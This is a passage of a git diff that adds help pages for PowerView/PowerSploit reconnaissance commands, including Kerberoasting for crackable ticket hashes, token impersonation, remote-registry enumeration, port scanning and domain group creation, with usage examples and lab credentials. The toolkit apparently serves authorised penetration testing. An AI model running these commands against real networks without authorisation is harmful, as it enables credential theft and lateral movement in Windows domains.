+### PowerView.CachedRDPConnection

+

+A PSCustomObject containing the ComputerName and cached RDP information.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-WMIRegLastLoggedOn.md b/docs/Recon/Get-WMIRegLastLoggedOn.md
new file mode 100755
index 0000000..bed39e0
--- /dev/null
+++ b/docs/Recon/Get-WMIRegLastLoggedOn.md
@@ -0,0 +1,98 @@
+# Get-WMIRegLastLoggedOn

+

+## SYNOPSIS

+Returns the last user who logged onto the local (or a remote) machine.

+

+Note: This function requires administrative rights on the machine you're enumerating.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-WMIRegLastLoggedOn [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function uses remote registry to enumerate the LastLoggedOnUser registry key

+for the local (or remote) machine.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-WMIRegLastLoggedOn

+```

+

+Returns the last user logged onto the local machine.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1

+```

+

+Returns the last user logged onto WINDOWS1

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer | Get-WMIRegLastLoggedOn

+```

+

+Returns the last user logged onto all machines in the domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for remote registry values (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connecting to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LastLoggedOnUser

+

+A PSCustomObject containing the ComputerName and last loggedon user.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-WMIRegMountedDrive.md b/docs/Recon/Get-WMIRegMountedDrive.md
new file mode 100755
index 0000000..353bcf0
--- /dev/null
+++ b/docs/Recon/Get-WMIRegMountedDrive.md
@@ -0,0 +1,97 @@
+# Get-WMIRegMountedDrive

+

+## SYNOPSIS

+Returns information about saved network mounted drives for the local (or remote) machine.

+

+Note: This function requires administrative rights on the machine you're enumerating.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-WMIRegMountedDrive [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses remote registry functionality to enumerate recently mounted network drives.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-WMIRegMountedDrive

+```

+

+Returns the saved network mounted drives for the local machine.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local

+```

+

+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainComputer | Get-WMIRegMountedDrive

+```

+

+Returns the saved network mounted drives for all machines in the domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the hostname to query for mounted drive information (also accepts IP addresses).

+Defaults to 'localhost'.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: Localhost

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connecting to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.RegMountedDrive

+

+A PSCustomObject containing the ComputerName and mounted drive information.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-WMIRegProxy.md b/docs/Recon/Get-WMIRegProxy.md
new file mode 100755
index 0000000..b5fe966
--- /dev/null
+++ b/docs/Recon/Get-WMIRegProxy.md
@@ -0,0 +1,93 @@
+# Get-WMIRegProxy

+

+## SYNOPSIS

+Enumerates the proxy server and WPAD conents for the current user.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Get-WMIRegProxy [[-ComputerName] <String[]>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Enumerates the proxy server and WPAD specification for the current user

+on the local machine (default), or a machine specified with -ComputerName.

+It does this by enumerating settings from

+HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-WMIRegProxy

+```

+

+ComputerName           ProxyServer            AutoConfigURL         Wpad

+------------           -----------            -------------         ----

+WINDOWS1               http://primary.test...

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$Cred = Get-Credential "TESTLAB\administrator"

+```

+

+Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local

+

+ComputerName            ProxyServer            AutoConfigURL         Wpad

+------------            -----------            -------------         ----

+windows1.testlab.local  primary.testlab.local

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the system to enumerate proxy settings on.

+Defaults to the local host.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: HostName, dnshostname, name

+

+Required: False

+Position: 1

+Default value: $Env:COMPUTERNAME

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connecting to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more computer name specification strings  on the pipeline (netbios or FQDN).

+

+## OUTPUTS

+

+### PowerView.ProxySettings

+

+Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Invoke-Kerberoast.md b/docs/Recon/Invoke-Kerberoast.md
new file mode 100755
index 0000000..edfb89b
--- /dev/null
+++ b/docs/Recon/Invoke-Kerberoast.md
@@ -0,0 +1,233 @@
+# Invoke-Kerberoast

+

+## SYNOPSIS

+Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.

+

+Author: Will Schroeder (@harmj0y), @machosec  

+License: BSD 3-Clause  

+Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, Get-DomainUser, Get-DomainSPNTicket

+

+## SYNTAX

+

+```

+Invoke-Kerberoast [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-SearchBase <String>]

+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-OutputFormat <String>] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Uses Get-DomainUser to query for user accounts with non-null service principle

+names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.

+The ticket format can be specified with -OutputFormat \<John/Hashcat\>.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-Kerberoast | fl

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Invoke-Kerberoast -Domain dev.testlab.local | fl

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -orce

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLB\dfm.a', $SecPassword)

+Invoke-Kerberoast -Credential $Cred -Verbose | fl

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -OutputFormat

+Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.

+Defaults to 'John'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Format

+

+Required: False

+Position: Named

+Default value: John

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.SPNTicket

+

+Outputs a custom object containing the SamAccountName, ServicePrincipalName, and encrypted ticket section.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Invoke-Portscan.md b/docs/Recon/Invoke-Portscan.md
new file mode 100755
index 0000000..8e1ef27
--- /dev/null
+++ b/docs/Recon/Invoke-Portscan.md
@@ -0,0 +1,430 @@
+# Invoke-Portscan

+

+## SYNOPSIS

+Simple portscan module

+

+PowerSploit Function: Invoke-Portscan  

+Author: Rich Lundeen (http://webstersProdigy.net)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+### cmdHosts

+```

+Invoke-Portscan -Hosts <String[]> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]

+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]

+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]

+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]

+ [-quiet] [-ForceOverwrite]

+```

+

+### fHosts

+```

+Invoke-Portscan -HostFile <String> [-ExcludeHosts <String>] [-Ports <String>] [-PortFile <String>]

+ [-TopPorts <String>] [-ExcludedPorts <String>] [-SkipDiscovery] [-PingOnly] [-DiscoveryPorts <String>]

+ [-Threads <Int32>] [-nHosts <Int32>] [-Timeout <Int32>] [-SleepTimer <Int32>] [-SyncFreq <Int32>] [-T <Int32>]

+ [-GrepOut <String>] [-XmlOut <String>] [-ReadableOut <String>] [-AllformatsOut <String>] [-noProgressMeter]

+ [-quiet] [-ForceOverwrite]

+```

+

+## DESCRIPTION

+Does a simple port scan using regular sockets, based (pretty) loosely on nmap

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-Portscan -Hosts "webstersprodigy.net,google.com,microsoft.com" -TopPorts 50

+```

+

+Description

+-----------

+Scans the top 50 ports for hosts found for webstersprodigy.net,google.com, and microsoft.com

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+echo webstersprodigy.net | Invoke-Portscan -oG test.gnmap -f -ports "80,443,8080"

+```

+

+Description

+-----------

+Does a portscan of "webstersprodigy.net", and writes a greppable output file

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Invoke-Portscan -Hosts 192.168.1.1/24 -T 4 -TopPorts 25 -oA localnet

+```

+

+Description

+-----------

+Scans the top 20 ports for hosts found in the 192.168.1.1/24 range, outputs all file formats

+

+## PARAMETERS

+

+### -Hosts

+Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in

+

+```yaml

+Type: String[]

+Parameter Sets: cmdHosts

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+### -HostFile

+Input hosts from file rather than commandline

+

+```yaml

+Type: String

+Parameter Sets: fHosts

+Aliases: iL

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludeHosts

+Exclude these comma seperated hosts

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: exclude

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Ports

+Include these comma seperated ports (can also be a range like 80-90)

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: p

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PortFile

+Input ports from a file

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: iP

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -TopPorts

+Include the x top ports - only goes to 1000, default is top 50

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ExcludedPorts

+Exclude these comma seperated ports

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: xPorts

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SkipDiscovery

+Treat all hosts as online, skip host discovery

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: Pn

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -PingOnly

+Ping scan only (disable port scan)

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: sn

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DiscoveryPorts

+Comma separated ports used for host discovery.

+-1 is a ping

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: PS

+

+Required: False

+Position: Named

+Default value: -1,445,80,443

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+number of max threads for the thread pool (per host)

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 100

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -nHosts

+number of hosts to concurrently scan

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 25

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Timeout

+Timeout time on a connection in miliseconds before port is declared filtered

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 2000

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SleepTimer

+Wait before thread checking, in miliseconds

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 500

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SyncFreq

+How often (in terms of hosts) to sync threads and flush output

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 1024

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -T

+\[0-5\] shortcut performance options.

+Default is 3.

+higher is more aggressive.

+Sets (nhosts, threads,timeout)

+    5 {$nHosts=30;  $Threads = 1000; $Timeout = 750  }

+    4 {$nHosts=25;  $Threads = 1000; $Timeout = 1200 }

+    3 {$nHosts=20;  $Threads = 100;  $Timeout = 2500 }

+    2 {$nHosts=15;  $Threads = 32;   $Timeout = 3000 }

+    1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -GrepOut

+Greppable output file

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: oG

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -XmlOut

+output XML file

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: oX

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ReadableOut

+output file in 'readable' format

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: oN

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AllformatsOut

+output in readable (.nmap), xml (.xml), and greppable (.gnmap) formats

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: oA

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -noProgressMeter

+Suppresses the progress meter

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -quiet

+supresses returned output and don't store hosts in memory - useful for very large scans

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: q

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ForceOverwrite

+Force Overwrite if output Files exist.

+Otherwise it throws exception

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: F

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://webstersprodigy.net](http://webstersprodigy.net)

+

diff --git a/docs/Recon/Invoke-ReverseDnsLookup.md b/docs/Recon/Invoke-ReverseDnsLookup.md
new file mode 100755
index 0000000..2c74e3c
--- /dev/null
+++ b/docs/Recon/Invoke-ReverseDnsLookup.md
@@ -0,0 +1,106 @@
+# Invoke-ReverseDnsLookup

+

+## SYNOPSIS

+Perform a reverse DNS lookup scan on a range of IP addresses.

+

+PowerSploit Function: Invoke-ReverseDnsLookup  

+Author: Matthew Graeber (@mattifestation)  

+License: BSD 3-Clause  

+Required Dependencies: None  

+Optional Dependencies: None

+

+## SYNTAX

+

+```

+Invoke-ReverseDnsLookup [-IpRange] <String>

+```

+

+## DESCRIPTION

+Invoke-ReverseDnsLookup scans an IP address range for DNS PTR records.

+This script is useful for performing DNS reconnaissance prior to conducting an authorized penetration test.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Invoke-ReverseDnsLookup 74.125.228.0/29

+```

+

+IP              HostName

+--              --------

+74.125.228.1    iad23s05-in-f1.1e100.net

+74.125.228.2    iad23s05-in-f2.1e100.net

+74.125.228.3    iad23s05-in-f3.1e100.net

+74.125.228.4    iad23s05-in-f4.1e100.net

+74.125.228.5    iad23s05-in-f5.1e100.net

+74.125.228.6    iad23s05-in-f6.1e100.net

+

+Description

+-----------

+Returns the hostnames of the IP addresses specified by the CIDR range.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Invoke-ReverseDnsLookup '74.125.228.1,74.125.228.4-74.125.228.6'

+```

+

+IP              HostName

+--              --------

+74.125.228.1    iad23s05-in-f1.1e100.net

+74.125.228.4    iad23s05-in-f4.1e100.net

+74.125.228.5    iad23s05-in-f5.1e100.net

+74.125.228.6    iad23s05-in-f6.1e100.net

+

+Description

+-----------

+Returns the hostnames of the IP addresses specified by the IP range specified.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Write-Output "74.125.228.1,74.125.228.0/29" | Invoke-ReverseDnsLookup

+```

+

+IP                                                          HostName

+--                                                          --------

+74.125.228.1                                                iad23s05-in-f1.1e100.net

+74.125.228.1                                                iad23s05-in-f1.1e100.net

+74.125.228.2                                                iad23s05-in-f2.1e100.net

+74.125.228.3                                                iad23s05-in-f3.1e100.net

+74.125.228.4                                                iad23s05-in-f4.1e100.net

+74.125.228.5                                                iad23s05-in-f5.1e100.net

+74.125.228.6                                                iad23s05-in-f6.1e100.net

+

+Description

+-----------

+Returns the hostnames of the IP addresses piped from another source.

+

+## PARAMETERS

+

+### -IpRange

+Specifies the IP address range.

+The range provided can be in the form of a single IP address, a low-high range, or a CIDR range.

+Comma-delimited ranges may can be provided.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByValue)

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.exploit-monday.com

+https://github.com/mattifestation/PowerSploit]()

+

diff --git a/docs/Recon/Invoke-RevertToSelf.md b/docs/Recon/Invoke-RevertToSelf.md
new file mode 100755
index 0000000..4e978ac
--- /dev/null
+++ b/docs/Recon/Invoke-RevertToSelf.md
@@ -0,0 +1,56 @@
+# Invoke-RevertToSelf

+

+## SYNOPSIS

+Reverts any token impersonation.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+```

+Invoke-RevertToSelf [[-TokenHandle] <IntPtr>]

+```

+

+## DESCRIPTION

+This function uses RevertToSelf() to revert any impersonated tokens.

+If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),

+CloseHandle() is used to close the opened handle.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+$Token = Invoke-UserImpersonation -Credential $Cred

+Invoke-RevertToSelf -TokenHandle $Token

+

+## PARAMETERS

+

+### -TokenHandle

+An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.

+

+```yaml

+Type: IntPtr

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Invoke-UserImpersonation.md b/docs/Recon/Invoke-UserImpersonation.md
new file mode 100755
index 0000000..6b1afc4
--- /dev/null
+++ b/docs/Recon/Invoke-UserImpersonation.md
@@ -0,0 +1,100 @@
+# Invoke-UserImpersonation

+

+## SYNOPSIS

+Creates a new "runas /netonly" type logon and impersonates the token.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+### Credential (Default)

+```

+Invoke-UserImpersonation -Credential <PSCredential> [-Quiet]

+```

+

+### TokenHandle

+```

+Invoke-UserImpersonation -TokenHandle <IntPtr> [-Quiet]

+```

+

+## DESCRIPTION

+This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType

+to simulate "runas /netonly".

+The resulting token is then impersonated with

+ImpersonateLoggedOnUser() and the token handle is returned for later usage

+with Invoke-RevertToSelf.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Invoke-UserImpersonation -Credential $Cred

+

+## PARAMETERS

+

+### -Credential

+A \[Management.Automation.PSCredential\] object with alternate credentials

+to impersonate in the current thread space.

+

+```yaml

+Type: PSCredential

+Parameter Sets: Credential

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -TokenHandle

+An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.

+If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()

+is executed.

+

+```yaml

+Type: IntPtr

+Parameter Sets: TokenHandle

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Quiet

+Suppress any warnings about STA vs MTA.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### IntPtr

+

+The TokenHandle result from LogonUser.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/New-DomainGroup.md b/docs/Recon/New-DomainGroup.md
new file mode 100755
index 0000000..fc5cac0
--- /dev/null
+++ b/docs/Recon/New-DomainGroup.md
@@ -0,0 +1,150 @@
+# New-DomainGroup

+

+## SYNOPSIS

+Creates a new domain group (assuming appropriate permissions) and returns the group object.

+

+TODO: implement all properties that New-ADGroup implements (https://technet.microsoft.com/en-us/library/ee617253.aspx).

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-PrincipalContext

+

+## SYNTAX

+

+```

+New-DomainGroup [-SamAccountName] <String> [[-Name] <String>] [[-DisplayName] <String>]

+ [[-Description] <String>] [[-Domain] <String>] [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+First binds to the specified domain context using Get-PrincipalContext.

+The bound domain context is then used to create a new

+DirectoryServices.AccountManagement.GroupPrincipal with the specified

+group properties.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.'

+```

+

+Creates the 'TestGroup' group with the specified description.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+New-DomainGroup -SamAccountName TestGroup -Description 'This is a test group.' -Credential $Cred

+

+Creates the 'TestGroup' group with the specified description using the specified alternate credentials.

+

+## PARAMETERS

+

+### -SamAccountName

+Specifies the Security Account Manager (SAM) account name of the group to create.

+Maximum of 256 characters.

+Mandatory.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Name

+Specifies the name of the group to create.

+If not provided, defaults to SamAccountName.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -DisplayName

+Specifies the display name of the group to create.

+If not provided, defaults to SamAccountName.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

